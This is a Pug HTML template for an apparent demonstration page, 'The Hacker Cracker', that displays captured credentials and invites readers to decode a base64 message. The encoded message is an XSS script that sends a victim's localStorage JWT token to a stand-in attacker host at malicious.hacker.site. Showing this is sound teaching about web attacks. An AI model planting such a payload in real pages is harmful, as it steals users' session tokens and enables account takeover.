doctype html
html
  head
    meta(charset="utf-8")
    meta(name="viewport" content="width=device-width,initial-scale=1")
    title The Hacker Cracker

    style
      | body { background-color: #000; color: #fff; text-align: center; }

  body
    h1 Hahaha!

    p We got your credentials!

    pre
      code= jar

    img(src="https://cd.sseu.re/hacker-cyber-attack-640x522.jpg_-_Google_Search-2020-10-30-j1kjk.jpg")

    p Don't know what happened? Base64 decode this message and see what this attacker did
    pre
      code PHNjcmlwdD53aW5kb3cuc2V0VGltZW91dChmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uPSAnaHR0cHM6Ly9tYWxpY2lvdXMuaGFja2VyLnNpdGUvc3RlYWwtY3JlZGVudGlhbHM/amFyPScgKyBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnand0VG9rZW4nKTsgfSwgMTAwMCk7PC9zY3JpcHQ+
